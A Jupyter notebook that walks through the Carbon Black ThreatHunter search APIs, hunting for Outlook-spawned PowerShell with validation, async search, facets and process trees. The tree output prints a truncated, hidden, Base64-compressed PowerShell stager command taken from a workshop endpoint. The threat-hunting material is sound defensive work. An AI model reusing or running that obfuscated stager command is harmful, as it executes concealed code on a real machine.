# CBTH API Demonstration

This Jupyter Notebook demonstrates the CB ThreatHunter APIs, both by calling the raw REST endpoints and by using the `cbapi` Python module.

**NOTE:** Support for ThreatHunter in `cbapi` is still under development, and the interfaces are subject
to change.

## Prerequisites

There are two prerequisites for using this code: first, you need credentials to log into the API for your
Cb PSC organization; and second, you need the `cbapi` bindings to use this Python code directly. If you
want to use another language, or to call the REST API endpoints manually, you won't need to install `cbapi`.

### API Credentials

The first step is to create a connector in your Cb PSC organization. Log into the console and follow the
instructions at https://developer.carbonblack.com/reference/cb-defense/authentication/ to create an `API` type connector.

Once you have your connector, you'll need the following information:

1. URL endpoint (e.g. `defense-prod05.conferdeploy.net`) for the APIs. This is the same URL you would use for the PSC Web UI.
2. Connector ID and API key for the API connector.
3. "Org key": a unique identifier for your org, displayed at the top of the API Keys page.

### Install cbapi

The second step is needed only if you want to run this code directly. This Python script uses the `cbapi`
module. The support for ThreatHunter in `cbapi` is being actively developed in a fork available from
https://github.com/trailofbits/cbapi-python/tree/tob-cbth. To run this code as-is, you need to `git clone`
that repository, change into the `tob-cbth` branch, and install `cbapi` in a virtualenv.

`cbapi` uses a credential file to read the API secret keys. Whenever you write scripts to interact with the
Cb APIs (or any API for that matter) you should **always** keep your API secret keys separate from your script.
If your script is ever exposed, either intentionally (by sharing it), or accidentally, then your API token
could be compromised if it were embedded inside your script.

To learn more about credential files and `cbapi`, see the docs at https://cbapi.readthedocs.io/en/latest/#api-credentials.
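
As a rough illustration of how a credential file keeps secrets out of the script, the sketch below parses an INI-style profile using only the standard library. The field names (`url`, `token`, `ssl_verify`), the helper name `load_profile`, and the sample values are assumptions made for illustration; consult the `cbapi` documentation linked above for the actual file location and supported keys.

```python
import configparser

# Hypothetical credential file contents; in practice this text lives in a file
# outside your script and is never committed to source control.
SAMPLE_CREDENTIALS = """
[devday]
url = https://defense-prod05.conferdeploy.net
token = XXXXXXXXXXXXXXXXXXXXXXXX/YYYYYYYYYY
ssl_verify = True
"""

def load_profile(text, profile):
    """Return the settings stored under one named profile."""
    parser = configparser.ConfigParser()
    parser.read_string(text)
    section = parser[profile]
    return {
        "url": section["url"].rstrip("/"),
        "token": section["token"],
        "ssl_verify": section.getboolean("ssl_verify", fallback=True),
    }

creds = load_profile(SAMPLE_CREDENTIALS, "devday")
print(creds["url"])
```

The script only ever names the profile (`devday`), so sharing the script does not share the token.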

## Documentation

More information on configuring `cbapi`:
https://cbapi.readthedocs.io/en/latest/installation.html

Documentation for the ThreatHunter APIs is now available on the Developer Network website at: https://developer.carbonblack.com/reference/cb-threathunter/

## Asynchronous Search Model
ThreatHunter is based on a scalable, multi-tenant architecture that is capable of ingesting tens of millions of events per second. Searches are built to scale and perform.
Searches in ThreatHunter are asynchronous. This gives both API and UI users a better experience, since a search can be initiated quickly and its results gathered later and incrementally. Another advantage is that results can be referenced over and over without re-running the search.

![title](search.png)
1. When customer C1 searches for data through the search API, the search is distributed across a potentially large number of indices related to that customer and the desired time frame, without touching unrelated indices.
2. Each index reports results back to the AWS S3 bucket.
3. A separate API call retrieves the data. The result payload is always aggregated and also contains information on the progress of the search.


## Imports

First things first, we import our `cbapi` module.

We can also enable debug logging, which will provide an output of the underlying REST API calls that 
are made to the backend.

Finally, we instantiate `CbThreatHunterAPI` using the profile "devday", which we have configured outside of this Notebook.

In [2]:
# Import ThreatHunter and Defense modules.
# - the need to import Defense and use a separate API key will go away when the migration of platform
#   APIs to the Custom Connector type is complete.

from cbapi.psc.threathunter import *

# pretty printer for making the output more readable
import pprint
import time

# Import logging module to see the requests to the REST API

# import logging
# logging.basicConfig()
# logging.getLogger("cbapi").setLevel(logging.DEBUG)

th = CbThreatHunterAPI(profile="devday")    # This is the 'name' of your credential in the credential file
orgkey="7YZFGDDN"  # This is our orgkey. Please update with orgkey of the actual org you will manage

## Querying CBTH

As a first example, let's look for any processes that match our IOC: children of `outlook.exe` processes that themselves start PowerShell. This might point to a malicious application started from Outlook.

The query first has to be written in Solr syntax. In this case, it will be:
```
parent_name:outlook.exe childproc_name:powershell.exe
```

You could, for example, paste this query as is into the ThreatHunter Investigate page and get the results. However, let's see how we could do this with the APIs.

## Using Curl

We will not use curl in this demo, but here is roughly how it would be done. The details of the API token are hidden in these examples.

Since queries are asynchronous, you issue two requests. The first issues the query and returns a token:
```
$curl -H "Content-Type: application/json" -H "X-Auth-Token:XXXXXXXXXXXXXXXXXXXXXXXX/YYYYYYYYYY" -XPOST "https://defense-prod05.conferdeploy.net/threathunter/search/v1/orgs/7YZFGDDN/processes/search_jobs" -d '{
                         "search_params": {
                             "q": "parent_name:outlook.exe childproc_name:powershell.exe",
                             "sort": "process_name ASC"
                         }}'
```
Note that you can also specify a sort order.

As a result of this, you will get something like:
```
{'query': {'cb.max_backend_timestamp': 1559244344000,
           'cb.max_device_timestamp': 1559244344000,
           'cb.min_backend_timestamp': 0,
           'cb.min_device_timestamp': 0,
           'q': '*:*',
           'rows': 500,
           'sort': 'process_name ASC',
           'start': 0},
 'query_id': '3e591d5e-6a43-4bae-90d6-76e815227b3d'}
 ```
Then, using the `query_id` token, you can ask for results with a GET request:
```
$curl -H "X-Auth-Token:XXXXXXXXXXXXXXXXXXXXXXXX/YYYYYYYYYY" -XGET "https://defense-prod05.conferdeploy.net/threathunter/search/v1/orgs/7YZFGDDN/processes/search_jobs/3e591d5e-6a43-4bae-90d6-76e815227b3d/results?start_row=0&row_count=3"
```
This returns up to the first 3 results of the query, along with information on the query's progress (in case it is still running).
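
The same two requests can be sketched in Python with only the standard library. The helper names below are hypothetical and nothing is sent over the network; the paths and query parameters are the ones from the curl examples above.

```python
import json
from urllib.parse import urlencode

BASE_URL = "https://defense-prod05.conferdeploy.net"

def search_job_request(org_key, query, sort):
    """Build the URL and JSON body for the POST that starts a search."""
    url = f"{BASE_URL}/threathunter/search/v1/orgs/{org_key}/processes/search_jobs"
    body = json.dumps({"search_params": {"q": query, "sort": sort}})
    return url, body

def results_url(org_key, query_id, start_row=0, row_count=3):
    """Build the URL for the GET that fetches one page of results."""
    params = urlencode({"start_row": start_row, "row_count": row_count})
    return (f"{BASE_URL}/threathunter/search/v1/orgs/{org_key}"
            f"/processes/search_jobs/{query_id}/results?{params}")

post_url, post_body = search_job_request(
    "7YZFGDDN",
    "parent_name:outlook.exe childproc_name:powershell.exe",
    "process_name ASC",
)
get_url = results_url("7YZFGDDN", "3e591d5e-6a43-4bae-90d6-76e815227b3d")
print(post_url)
print(get_url)
```

Keeping URL construction in small functions makes it easy to reuse the same paths with whichever HTTP client you prefer.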

## Using cbapi With Raw Request Calls

Now, instead of using raw curl, let's use our `cbapi` library to start the same asynchronous query. In this step we will not use the full `cbapi` entity model, just its underlying session management and HTTP request wrapper. This still lets us see the low-level asynchronous API calls, but is simpler. Best of all, we don't have to keep our credential information inside the code.

We will also introduce a few more APIs here.

## Query Validation
The query validation API checks the query syntax and makes sure it is valid. This is useful when we want to confirm that our query uses correct syntax and field names.
Let's try two validation requests: the first uses an invalid field name, and the second is valid:

In [68]:
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_validation?q=parent_path:outlook.exe childproc_name:powershell.exe")
pprint.pprint(ret)

ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_validation?q=parent_name:outlook.exe childproc_name:powershell.exe")
pprint.pprint(ret)


{'invalid_message': 'org.apache.solr.common.SolrException: undefined field '
                    'parent_path',
 'invalid_trigger_offset': 0,
 'valid': False,
 'value_search_query': False}
{'valid': True, 'value_search_query': False}
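
A script will usually want to act on the validation result rather than just print it. The following is a minimal sketch that summarizes a response using the keys seen in the output above; the function name `describe_validation` is hypothetical, and the sample dictionaries are trimmed copies of that output.

```python
def describe_validation(response):
    """Turn a search_validation response into a one-line summary."""
    if response.get("valid"):
        return "query is valid"
    message = response.get("invalid_message", "no message returned")
    offset = response.get("invalid_trigger_offset")
    return f"query is invalid at offset {offset}: {message}"

# Sample responses shaped like the two outputs above.
bad = {
    "invalid_message": "org.apache.solr.common.SolrException: undefined field parent_path",
    "invalid_trigger_offset": 0,
    "valid": False,
    "value_search_query": False,
}
good = {"valid": True, "value_search_query": False}

print(describe_validation(bad))
print(describe_validation(good))
```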


## Search
Now, let's execute the actual search with the valid query. We will do two steps here:
1. Initiate the search and collect the `query_id` token.
2. Immediately query for the status of the search (without getting the results). This second step is optional, but it demonstrates the asynchronous nature of the search.

In [34]:
# Initiate search
ret = th.post_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs", {
                         "search_params": {
                             "q": "parent_name:outlook.exe childproc_name:powershell.exe",
                             "sort": "process_name ASC"
                         }
                     })
pprint.pprint(ret.json())

# Grab our query id token
query_id = ret.json()["query_id"]

# Check the status
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}")
print("Query status:")
pprint.pprint(ret)

{'query': {'cb.max_backend_timestamp': 1559487447000,
           'cb.max_device_timestamp': 1559487447000,
           'cb.min_backend_timestamp': 0,
           'cb.min_device_timestamp': 0,
           'q': 'parent_name:outlook.exe childproc_name:powershell.exe',
           'rows': 500,
           'sort': 'process_name ASC',
           'start': 0},
 'query_id': '881716d1-b2ba-4d2d-9941-219e9882e13f'}
Query status:
{'completed': 9, 'contacted': 9}
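
In a script you would normally poll the status until the search finishes instead of checking it once. The sketch below shows one way to do that, assuming the search is done once `completed` catches up with `contacted`; that reading of the status payload is an assumption, as are the helper name `wait_for_search` and its timing defaults. A stand-in status function is used so the example runs without a server.

```python
import time

def wait_for_search(fetch_status, timeout=30.0, interval=0.5):
    """Poll fetch_status() until every contacted searcher has completed.

    fetch_status is any callable returning a dict shaped like the status
    payload above, e.g. {'completed': 9, 'contacted': 9}.
    """
    deadline = time.monotonic() + timeout
    while True:
        status = fetch_status()
        # Assumption: the search is done once completed catches up with contacted.
        if status["contacted"] > 0 and status["completed"] >= status["contacted"]:
            return status
        if time.monotonic() >= deadline:
            raise TimeoutError(f"search still running: {status}")
        time.sleep(interval)

# Stand-in for the real status call: reports progress over three polls.
fake_statuses = iter([
    {"completed": 2, "contacted": 9},
    {"completed": 7, "contacted": 9},
    {"completed": 9, "contacted": 9},
])
final = wait_for_search(lambda: next(fake_statuses), interval=0.01)
print(final)
```

In this notebook, the callable could wrap the same `th.get_object(...)` status request used in the cell above.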


Finally, using the same API as we did with curl, we will ask for the actual results.
It is important to note that you can ask for these results as many times as you want and, as long as the query is complete, you will get the original results. In other words, the `results` endpoint doesn't re-execute the query; it only returns the previously stored results.
These results will be stored for 30 days.

In [7]:
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}/results?start_row=0&row_count=3")
pprint.pprint(ret)

{'data': [{'backend_timestamp': '2019-05-21T15:56:45.670Z',
           'childproc_count': 0,
           'crossproc_count': 0,
           'device_id': 8929889,
           'device_name': 'desktop-1a1jgo5',
           'device_timestamp': '2019-05-07T23:30:41.254Z',
           'event_description': 'The application "<share><link '
                                'hash="5948a6366c6ddd600848c7454a70035028ef40f0238c3341716b1703e5d1ecfc">C:\\program '
                                'files (x86)\\microsoft '
                                'office\\office15\\excel.exe</link></share>" '
                                'invoked the application "<share><link '
                                'hash="d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5">C:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe</link></share>". '
                                'The operation was <accent>blocked</accent> '
                                'and the application <accent>terminated by Cb 
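
Because the `results` endpoint takes `start_row` and `row_count`, larger result sets can be read page by page. Here is a minimal paging sketch; `iter_result_rows` and the stand-in fetch function are hypothetical, and the stop condition (a page shorter than requested) is an assumption that only holds once the search has completed.

```python
def iter_result_rows(fetch_page, page_size=100):
    """Yield rows one page at a time until a short or empty page arrives.

    fetch_page(start_row, row_count) must return a dict with a 'data' list,
    like the results payload above.
    """
    start_row = 0
    while True:
        page = fetch_page(start_row, page_size)
        rows = page.get("data", [])
        yield from rows
        if len(rows) < page_size:
            break
        start_row += len(rows)

# Stand-in for the results endpoint: serves slices of seven fake rows.
FAKE_ROWS = [{"device_id": n} for n in range(7)]

def fake_fetch_page(start_row, row_count):
    return {"data": FAKE_ROWS[start_row:start_row + row_count]}

rows = list(iter_result_rows(fake_fetch_page, page_size=3))
print(len(rows))
```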

## Results Segmentation
As in Cb Response, each query result actually represents a process "segment", that is, a set of events
associated with a process.
If you issue a default search request, all of the segments are returned, which can cause a lot of duplicate results for long-lived processes.

For more information about process segments, see https://developer.carbonblack.com/reference/enterprise-response/6.1/process-api-changes/#new-immutable-model.

One way around this is to use the `collapse` function available in Solr. In that case, CBTH will try its best to coalesce these results by process when possible, returning only the latest segment.
You might still get duplicates in two cases:
1. If segments come from different indices.
2. If there are too many results for Solr to group in each index (the threshold is currently configured at 1M results).

In [3]:
# Initiate search without collapsing results
ret = th.post_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs", {
                         "search_params": {
                             "q": "process_name:explorer.exe",
                             "sort": "process_name ASC"
                         }
                     })
# Grab our query id token
query_id = ret.json()["query_id"]
time.sleep(2)
# Fetch the results payload; its response_header carries the result counts
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}/results?start=0&rows=0")
pprint.pprint(ret)

# Same search with collapse
ret = th.post_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs", {
                         "search_params": {
                             "q": "process_name:explorer.exe",
                             "sort": "process_name ASC", 
                             "fq": "{!collapse field=process_collapse_id sort='device_timestamp desc'}"
                         }
                     })
# Grab our query id token
query_id = ret.json()["query_id"]
time.sleep(2)
# Fetch the results payload; its response_header carries the result counts
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}/results?start=0&rows=0")
pprint.pprint(ret)

{'data': [],
 'facets': {'facet_fields': {},
            'facet_intervals': {},
            'facet_queries': {},
            'facet_ranges': {},
            'num_found': 0},
 'query_id': '91c088ec-61a3-495c-b57e-3afe4a6cb243',
 'response_header': {'end_time': 1559505966000,
                     'num_available': 1789,
                     'num_found': 1824,
                     'searchers_meta': {'completed': 10, 'contacted': 10},
                     'start_time': 0}}
{'data': [],
 'facets': {'facet_fields': {},
            'facet_intervals': {},
            'facet_queries': {},
            'facet_ranges': {},
            'num_found': 0},
 'query_id': 'd38c10e9-d691-440b-8054-600cd0e62386',
 'response_header': {'end_time': 1559505969000,
                     'num_available': 153,
                     'num_found': 153,
                     'searchers_meta': {'completed': 10, 'contacted': 10},
                     'start_time': 0}}
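
To make the effect of collapsing easier to see, the two `num_found` values can be compared directly. This is a small sketch over the two payloads above, reduced to the fields it uses; the helper name `collapse_summary` is hypothetical.

```python
def collapse_summary(uncollapsed, collapsed):
    """Compare num_found between a plain search and a collapsed one."""
    before = uncollapsed["response_header"]["num_found"]
    after = collapsed["response_header"]["num_found"]
    ratio = round(before / after, 1) if after else None
    return {"uncollapsed": before, "collapsed": after, "ratio": ratio}

# Only the fields used here, copied from the two outputs above.
plain = {"response_header": {"num_found": 1824, "num_available": 1789}}
merged = {"response_header": {"num_found": 153, "num_available": 153}}

summary = collapse_summary(plain, merged)
print(summary)
```

For this sample data, the collapsed search reports roughly one twelfth as many hits as the uncollapsed one.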


## Completeness of Results
CBTH will not always give you back all results. Instead, it returns the first N results (by default, the aggregated top 500 results from each index). The intent of CBTH search is not to give you an exhaustive list, but to help you narrow the results down to a small set, in order to find the "needle in the haystack" of the attack.

In order to help you with this process, you can use Solr Facets, which are generated for the **entire** data set.
For more information on Solr facets, you can visit:
https://lucene.apache.org/solr/guide/7_7/faceting.html

Here is an example of how to do that:

In [11]:
# Initiate non-filtered search, faceting by process and device
ret = th.post_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs", {
                         "search_params": {
                             "q": "*:*",
                             "rows": 0,   ## We don't want individual results here
                             "facet": True,
                             "facet.field": ["process_name", "device_name"], # Facet by two fields
                             "facet.mincount": 1,  # Don't return 0-result facets 
                             "sort": "backend_timestamp DESC"
                         }
                     })
# Grab our query id token
query_id = ret.json()["query_id"]
time.sleep(2)
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}/results")
pprint.pprint(ret)

{'data': [],
 'facets': {'facet_fields': {'device_name': {'bcrusher-mac.local': 1252,
                                             'desktop-1a1jgo5': 18319,
                                             'desktop-6rvhabb': 13518,
                                             'desktop-9omoop7': 30235,
                                             'desktop-cdbtest': 9537,
                                             'dtroi-mac.local': 949,
                                             'enduser01': 1703351,
                                             'gforge-mac.local': 1130,
                                             'jim-kirks-mac.local': 1811,
                                             'lq-01': 6772,
                                             'lq-03': 21874,
                                             'lq-04': 13437,
                                             'lq-06': 22843,
                                             'lq-07': 21393,
                                             '
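
Facet output like this is easier to read once it is ranked. The sketch below sorts one facet field by count; `top_facets` is a hypothetical helper, and the sample dictionary holds a few of the `device_name` counts shown above.

```python
def top_facets(facet_counts, n=3):
    """Return the n largest (value, count) pairs from one facet field."""
    return sorted(facet_counts.items(), key=lambda item: item[1], reverse=True)[:n]

# A few device_name counts copied from the output above.
device_counts = {
    "bcrusher-mac.local": 1252,
    "desktop-1a1jgo5": 18319,
    "desktop-9omoop7": 30235,
    "enduser01": 1703351,
    "lq-06": 22843,
}

for name, count in top_facets(device_counts):
    print(f"{name}: {count}")
```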

Now that we have a breakdown by device and process, we might want to dive into one of them and, this time, facet by time:

In [20]:
# Initiate filtered search, faceting by time
ret = th.post_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs", {
                         "search_params": {
                             "q": "device_name:rj-win10vmw device_name:rj-win10vmw",
                             "rows": 0,   ## We don't want individual results here
                             "facet": True,
                             "facet.range": ["device_timestamp"], # Facet by device timestamp
                             "facet.range.start": "2019-05-26T01:00:00Z", # From date
                             "facet.range.end": "2019-05-27T01:00:00Z", # Until date
                             "facet.range.gap": "+1HOUR",
                             "sort": "backend_timestamp DESC"
                         }
                     })
# Grab our query id token
query_id = ret.json()["query_id"]
time.sleep(2)
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}/results")
pprint.pprint(ret["facets"]["facet_ranges"]["device_timestamp"]["counts"])


{'2019-05-26T01:00:00Z': 0,
 '2019-05-26T02:00:00Z': 0,
 '2019-05-26T03:00:00Z': 0,
 '2019-05-26T04:00:00Z': 0,
 '2019-05-26T05:00:00Z': 0,
 '2019-05-26T06:00:00Z': 0,
 '2019-05-26T07:00:00Z': 0,
 '2019-05-26T08:00:00Z': 0,
 '2019-05-26T09:00:00Z': 42,
 '2019-05-26T10:00:00Z': 0,
 '2019-05-26T11:00:00Z': 0,
 '2019-05-26T12:00:00Z': 361,
 '2019-05-26T13:00:00Z': 131,
 '2019-05-26T14:00:00Z': 983,
 '2019-05-26T15:00:00Z': 2444,
 '2019-05-26T16:00:00Z': 1181,
 '2019-05-26T17:00:00Z': 387,
 '2019-05-26T18:00:00Z': 43,
 '2019-05-26T19:00:00Z': 0,
 '2019-05-26T20:00:00Z': 0,
 '2019-05-26T21:00:00Z': 0,
 '2019-05-26T22:00:00Z': 0,
 '2019-05-26T23:00:00Z': 885,
 '2019-05-27T00:00:00Z': 509}
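
With hourly counts in hand, a natural next step is to pick out the hours that actually saw activity. A minimal sketch, using a subset of the counts above and a hypothetical helper named `active_buckets`:

```python
def active_buckets(counts):
    """Return (bucket_start, count) pairs for buckets with events, busiest first."""
    active = [(start, n) for start, n in counts.items() if n > 0]
    return sorted(active, key=lambda pair: pair[1], reverse=True)

# A subset of the hourly counts shown above.
hourly = {
    "2019-05-26T13:00:00Z": 131,
    "2019-05-26T14:00:00Z": 983,
    "2019-05-26T15:00:00Z": 2444,
    "2019-05-26T16:00:00Z": 1181,
    "2019-05-26T19:00:00Z": 0,
}

busiest_start, busiest_count = active_buckets(hourly)[0]
print(busiest_start, busiest_count)
```

The busiest bucket is a reasonable time window to use when narrowing the next search.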


## Using Full cbapi Entity Model

Now, let's see how we can do this task more simply, using the entity model. Note that the entity model hides the asynchronous nature of the query execution (it still uses it under the covers), making this process even easier. The downside is that you might not have all APIs at your disposal, and some of the APIs used under the covers might not be the latest version.

In [9]:
query = th.select(Process).where("parent_name:outlook.exe childproc_name:powershell.exe")
query_results = list(query)            # get all results from this query into a list
pprint.pprint(query_results)

[<cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00884261-0000083c-00000000-1d5052ce08a21cb> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00884261-00000544-00000000-1d504653629c21f> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00845349-00001908-00000000-1d4fbca034bbc93> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00845349-00000740-00000000-1d4fb981fa550e7> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00841a27-00001bb4-00000000-1d4fb36c99d10cd> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-008dec01-000018b8-00000000-1d50ffe0384be28> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-008dec01-000018b8-00000000-1d50ffe0384be28> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathu

As previously explained, some of the results will have the same process ID (aka process_guid). Therefore, we will create a map of unique process IDs ourselves.

In [10]:
unique_processes = {r.process_guid:r for r in query_results}
pprint.pprint(unique_processes)

{'7YZFGDDN-00841a27-00001bb4-00000000-1d4fb36c99d10cd': <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00841a27-00001bb4-00000000-1d4fb36c99d10cd> @ https://defense-prod05.conferdeploy.net,
 '7YZFGDDN-00845349-00000740-00000000-1d4fb981fa550e7': <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00845349-00000740-00000000-1d4fb981fa550e7> @ https://defense-prod05.conferdeploy.net,
 '7YZFGDDN-00845349-00001908-00000000-1d4fbca034bbc93': <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00845349-00001908-00000000-1d4fbca034bbc93> @ https://defense-prod05.conferdeploy.net,
 '7YZFGDDN-00884261-00000544-00000000-1d504653629c21f': <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00884261-00000544-00000000-1d504653629c21f> @ https://defense-prod05.conferdeploy.net,
 '7YZFGDDN-00884261-0000083c-00000000-1d5052ce08a21cb': <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00884261-0000083c-00000000-1d5052ce08a21cb> @ https://defense-prod05.conferdeploy.net,
 '7YZFGDDN-008dec01-00001
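
The dictionary comprehension above keeps whichever segment happens to come last for each process. If you would rather keep the newest segment explicitly, a sketch along these lines could be used. It works on plain dictionaries rather than `cbapi` `Process` objects, and the rows and GUIDs are hypothetical.

```python
def latest_segments(rows):
    """Keep one row per process_guid, preferring the newest device_timestamp."""
    latest = {}
    for row in rows:
        guid = row["process_guid"]
        current = latest.get(guid)
        # ISO 8601 timestamps in the same UTC format sort correctly as strings.
        if current is None or row["device_timestamp"] > current["device_timestamp"]:
            latest[guid] = row
    return latest

# Hypothetical rows: two segments of one process and one segment of another.
sample_rows = [
    {"process_guid": "ORG-0001", "device_timestamp": "2019-05-26T15:31:02.862Z"},
    {"process_guid": "ORG-0001", "device_timestamp": "2019-05-26T15:30:41.254Z"},
    {"process_guid": "ORG-0002", "device_timestamp": "2019-05-21T10:00:00.000Z"},
]

unique = latest_segments(sample_rows)
print(unique["ORG-0001"]["device_timestamp"])
```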

Let's take a look at one of the Process objects to see what sort of information is retrieved.

In [11]:
interesting_process_guid='7YZFGDDN-008f8e78-000012a0-00000000-1d513d7ef9c51a8'
process = unique_processes[interesting_process_guid]
print(process)

Process object, bound to https://defense-prod05.conferdeploy.net.
-------------------------------------------------------------------------------

       backend_timestamp: 2019-05-26T15:36:24.851Z
         childproc_count: 1
         crossproc_count: 7
      device_external_ip: 129.146.76.64
         device_group_id: 0
               device_id: 9408120
      device_internal_ip: 
             device_name: rj-win10vmw
               device_os: WINDOWS
        device_policy_id: 0
        device_timestamp: 2019-05-26T15:31:02.862Z
           filemod_count: 18
             index_class: default
           modload_count: 72
           netconn_count: 0
                  org_id: 7YZFGDDN
             parent_guid: 7YZFGDDN-008f8e78-00001194-00000000-1d513d7e370...
             parent_hash: ['0355d3fde2df1315a6677fe0b50b101a5e7ab2db39402...
             parent_name: c:\program files (x86)\microsoft office\office1...
              parent_pid: 4500
            partition_id: 0
         process_cmdl

There are a few things to note here:

1. The hash attributes are *arrays* and not strings. ThreatHunter tracks both the MD5 and SHA-256 hashes for binaries, so you'll see one or two entries in the hash attributes.
2. The command line, username, and process PID are all arrays as well! This is done to accurately track activity during `fork` and `exec` on Unix systems. A process may `fork`, meaning that it clones itself into a different PID. That process may continue to execute the original binary, or replace itself with a different binary via `exec` later (causing the command line to change as well).
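
Since a hash attribute may hold one or two entries, code that needs a specific hash type has to pick it out. One simple approach, sketched below, is to tell them apart by length: an MD5 digest is 32 hex characters and a SHA-256 digest is 64. The helper name `label_hashes` is hypothetical, and the sample values are hashes of each length taken from outputs in this notebook.

```python
def label_hashes(hashes):
    """Map 'md5' / 'sha256' to the matching entry, judged by hex length."""
    lengths = {32: "md5", 64: "sha256"}
    labeled = {}
    for value in hashes:
        kind = lengths.get(len(value))
        if kind is not None:
            labeled[kind] = value
    return labeled

# One hash of each length, taken from outputs in this notebook.
sample_hashes = [
    "2a30dac27f340726b1a7ade73eeddcbb",
    "5948a6366c6ddd600848c7454a70035028ef40f0238c3341716b1703e5d1ecfc",
]

print(label_hashes(sample_hashes))
```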

## Process Trees

Now let's see who called this process and what child processes it created. We can use the `tree` API to do this.

In [13]:
tree = process.tree()
pprint.pprint(tree)

<cbapi.psc.threathunter.models.Tree object at 0x3932ed0> @ https://defense-prod05.conferdeploy.net


The `tree` API is also asynchronous, but `cbapi` hides this detail and keeps polling for results until the query is complete.

Let's now step through the tree:

In [14]:
def print_information(proc, depth=0):
    print("{0}| {1}, {2} started process {3}".format('---'*depth, proc.get("device_timestamp", ""), proc.get("process_username", "unknown"), proc.get("process_cmdline", proc.get("process_name", ""))))
    
def recurse_tree(t, depth=0):
    if not isinstance(t, list):
        t = [t]

    for i in t:
        print_information(i, depth)
        if 'children' in i:
            recurse_tree(i['children'], depth+1)

recurse_tree(tree.nodes)    


| 2019-05-26T15:40:48.700Z, ['RJ-WIN10VMW\\EndUser'] started process ['"C:\\Program Files (x86)\\Microsoft Office\\Office15\\OUTLOOK.EXE" ']
---| 2019-05-26T15:31:02.868Z, ['RJ-WIN10VMW\\EndUser'] started process ['"C:\\Program Files (x86)\\Microsoft Office\\Office15\\EXCEL.EXE" /dde']
------| 2019-05-26T15:30:41.314Z, ['RJ-WIN10VMW\\EndUser'] started process ['powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\" nVPbTttAEH33V4wsS9iKbTkXEA1C4qa0SG2KCGofojw4m4FsWe9au+MkhubfOwanLYhWVZ+OvTtzzpnLBgKO4cT3phdKXRalsRT692g1qn4vXSjlRzMoq7mSAhzlxIAb4nu41HRFFr5IS1WuTpUyImzP1jFUUhNsWqxbfIiO/lvn3GJOeLNkWOx0qpZ3FcMv5fbrN+32pFH3Tzyy9WPguOgxrpPP828oCCa1IyzSMVI6MeIeybUI4fSNu9PFwqJzo7yQqp4NhyyAlgPWxt7H8FbGM97UJXL4hLiI4u3AK2vICKPa0BtRRl7g0nOjNRsN97rvemn34DDt9bO0u5/txTAY9CP4DqaiRFdKHUFQcnHTU2vzxttz3y41N1ULDP15TehzVsSBGw5k8msUKFcYBuUroge+z7yg/ge+6ZkkNrlCy61ojB

Now we can see how the Outlook process started the whole chain, which eventually launched PowerShell.

In [15]:
powershell_process = tree.nodes["children"][0]["children"][0]
pprint.pprint(powershell_process)

{'_s3_location': '1tzmuVdmSmaW0QwF6sPRqQ:16af4c61e94:3450:f3f:longTerm',
 'backend_timestamp': '2019-05-26T15:33:05.812Z',
 'childproc_count': 0,
 'crossproc_count': 0,
 'device_external_ip': '',
 'device_group': 'malware-workshop-policy',
 'device_group_id': 0,
 'device_id': 9408120,
 'device_internal_ip': '129.146.76.64',
 'device_name': 'rj-win10vmw',
 'device_os': 'WINDOWS',
 'device_policy_id': 0,
 'device_timestamp': '2019-05-26T15:30:41.314Z',
 'event_description': 'The application "<share><link '
                      'hash="d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5">C:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe</link></share>" '
                      'invoked the application "<share><link '
                      'hash="acdfbc988cc8c5846ca51421596654a63c99ef152eaa1ccb16f8790ca54107de">C:\\users\\enduser\\downloads\\ghhaefawkejvnkawe.bat</link></share>". ',
 'event_id': '75c787c47fcb11e996bedfe68c86904a',
 'event_type': 'CREATE_PROCESS',
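
Indexing into `children` by position works for this tree, but it depends on knowing the exact shape in advance. A more general sketch is to walk the nested `children` lists and collect every node that matches a condition. The helper name `find_nodes` and the sample tree below are hypothetical; the tree only mimics the nesting seen above.

```python
def find_nodes(node, predicate):
    """Yield every node in a nested 'children' tree that satisfies predicate."""
    if predicate(node):
        yield node
    for child in node.get("children", []):
        yield from find_nodes(child, predicate)

# Hypothetical tree with the same nesting as the process tree above.
sample_tree = {
    "process_name": "outlook.exe",
    "children": [
        {"process_name": "excel.exe",
         "children": [{"process_name": "powershell.exe", "children": []}]},
    ],
}

matches = list(find_nodes(sample_tree, lambda n: "powershell" in n.get("process_name", "")))
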